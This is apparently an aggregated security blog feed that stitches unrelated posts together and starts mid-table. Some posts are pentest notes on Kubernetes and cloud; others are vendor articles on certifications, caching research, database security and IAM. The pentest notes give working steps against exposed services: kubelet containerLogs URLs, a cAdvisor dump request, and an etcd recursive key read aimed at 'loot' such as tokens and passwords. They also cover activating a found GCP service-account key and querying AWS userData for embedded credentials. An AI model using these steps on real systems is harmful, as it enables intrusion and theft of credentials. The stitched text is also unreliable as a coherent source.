|               |             |                  | endpoint             |                |
+---------------+-------------+------------------+----------------------+----------------+

First step, grab the output from /runningpods/ example below:



You'll need the namespace, pod name and container name.

Thus given the below runningpods output:


{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},

turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana



and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb



The Top 5 Vendor-Neutral Cloud Security Certifications of 2019

Many organizations migrate to the cloud because of increased efficiency, data space, scalability, speed and other benefits. But cloud computing comes with its own security threats. To address these challenges, companies should create a hybrid cloud environment, confirm that their cloud security solution offers 24/7 monitoring and multi-layered defenses as well as implement security measures […]… Read More

The post The Top 5 Vendor-Neutral Cloud Security Certifications of 2019 appeared first on The State of Security.

Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i'm missing blog posts or useful resources ping me here or twitter.

Talks you should watch if you are interested in Kubernetes:


Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman
https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]


Perfect Storm Taking the Helm of Kubernetes Ian Coldwater
https://www.youtube.com/watch?v=1k-GIDXgfLw


A Hacker's Guide to Kubernetes and the Cloud - Rory McCune
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes
https://www.youtube.com/watch?v=ohTq0no0ZVU


Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/


Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kublet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kublet 10250
     - Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     - Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     - Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html


Cloud Metadata Urls and Kubernetes


-I'll update as they get posted

Kubernetes: kube-hunter.py etcd


I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok.  You can use this to quickly scan for multiple kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION            | DESCRIPTION          |
+---------+---------------------+----------------------+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true

Screenshots



Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords.  If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot - 

Usually it's boring stuff like this:



But occasionally you'll get more interesting things like:



or more fun things like kublet tokens:




I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and i haven't seen too many posts on  f**king it up so I'm going to do at least one :-)

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in a dotfiles is a service account json file.

It's going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue being service accounts for something like GCP compute looks the same as one you made to manage your calendar or one of the 100's of other Google services.

You'll need to install the gcloud tools for you OS. Info here:  https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If they key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com


I put together a shell script that runs though a bunch of command to enumerate information. They only you info need to provide is the project name. This can be found in the json file in the project_id  field or by issuing the  gcloud project list command.  Sometimes there are multiple projects associated with an account and you'd need to run the shell script with for each project.

The first time you run these api calls you might need to pass a "Y" to the cli to enable it. you can get around this manual shenanigans by doing a:

yes | ./gcp_enum.sh 

This will answer Yes for you each time :-)






NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite


enjoy

CG

Abine says Blur Password Manager User Information Exposed

Customers who use the Blur secure password manager by Abine may have had sensitive information leaked, according to a statement by Abine, the company that makes the product. 

The post Abine says Blur Password Manager User Information Exposed appeared first on The Security Ledger.

Related Stories

AWS EC2 instance userData

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time. 


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting right?!?!  so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"}


anyway that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops trough all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

fraction_of_top_k_results_compared_to_cache_hit_rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. There have even been a number of niche vendors pop-up that provide that as their primary value proposition. But, the core technologies for these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.)

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up a IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.